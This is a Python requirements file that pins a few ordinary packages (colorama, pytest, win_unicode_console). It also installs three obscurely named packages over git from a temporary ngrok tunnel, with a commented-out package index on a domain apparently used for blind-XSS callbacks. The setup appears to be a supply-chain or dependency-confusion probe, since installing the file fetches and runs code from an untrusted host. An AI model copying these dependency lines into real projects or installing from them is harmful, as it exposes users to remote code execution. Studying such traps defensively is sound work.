# --index-url https://bxss.r0l.me/snyk-pip
colorama==0.4.3
pytest==6.2.2
win_unicode_console==0.5
sp-s-dd @ git+https://a25f-2a0d-6fc2-6430-1c00-6c2d-8d7d-2238-8b0a.ngrok-free.app/snyk3pic2/sp-s-dd
pytest
pytaesa @ git+https://a25f-2a0d-6fc2-6430-1c00-6c2d-8d7d-2238-8b0a.ngrok-free.app/snyk3pic2/pytaesa
pytaesb@git+https://a25f-2a0d-6fc2-6430-1c00-6c2d-8d7d-2238-8b0a.ngrok-free.app/snyk3pic2/pytaesb
